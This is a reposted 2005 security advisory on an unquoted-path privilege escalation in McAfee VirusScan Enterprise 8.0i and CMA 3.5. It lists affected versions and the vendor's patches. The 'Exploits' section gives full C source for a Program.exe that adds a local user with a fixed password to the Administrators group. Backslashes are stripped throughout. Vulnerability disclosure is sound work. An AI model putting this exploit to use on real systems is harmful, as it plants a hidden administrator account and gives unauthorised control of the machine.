( Original article: http://reedarvin.thearvins.com/20051222-01.html )
Summary:
Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11)
and CMA 3.5 (patch 5) (http://www.mcafee.com/)
Details:
By default the naPrdMgr.exe process runs under the context of the
Local System account. Every so often it will run through a process
where it does the following:
- Attempts to run Program FilesNetwork AssociatesVirusScanEntVUtil.EXE
- Reads C:Program FilesCommon FilesNetwork AssociatesEngineSCAN.DAT
- Reads C:Program FilesCommon FilesNetwork AssociatesEngineNAMES.DAT
- Reads C:Program FilesCommon FilesNetwork AssociatesEngineCLEAN.DAT
The issue occurs when the naPrdMgr.exe process attempts to run the
C:Program FilesNetwork AssociatesVirusScanEntVUtil.EXE file.
Because of a lack of quotes the naPrdMgr.exe process first tries to
run C:Program.exe. If that is not found it tries to run C:Program
FilesNetwork.exe. When that is not found it finally runs the
EntVUtil.EXE file that it was originally intending to run. A malicious
user can create an application named Program.exe and place it on the
root of the C: and it will be run with Local System privileges by the
naPrdMgr.exe process. Source code for an example Program.exe is listed
below.
Vulnerable Versions:
McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)
Patches/Workarounds:
The vendor has released knowledge base article kb45256 to address the issue.
Solution one from the vendor:
"This issue is resolved in Patch 12."
Solution two from the vendor:
"The VirusScan Enterprise plugin VSPLUGIN.DLL has been updated to
resolve the potential exploit. The new plugin is available as a HotFix
from McAfee Tier III Technical Support."
Exploits:
// ===== Start Program.c ======
#include <windows.h>
#include <stdio.h>
INT main( VOID )
{
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
printf( "Creating user "Program" with password "Pr0gr@m$$"...n" );
wsprintf( szCmdLine, "%s\system32\net.exe user Program
Pr0gr@m$$ /add", szWinDir );
system( szCmdLine );
printf( "Adding user "Program" to the local Administrators group...n" );
wsprintf( szCmdLine, "%s\system32\net.exe localgroup
Administrators Program /add", szWinDir );
system( szCmdLine );
return 0;
}
// ===== End Program.c ======
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/ )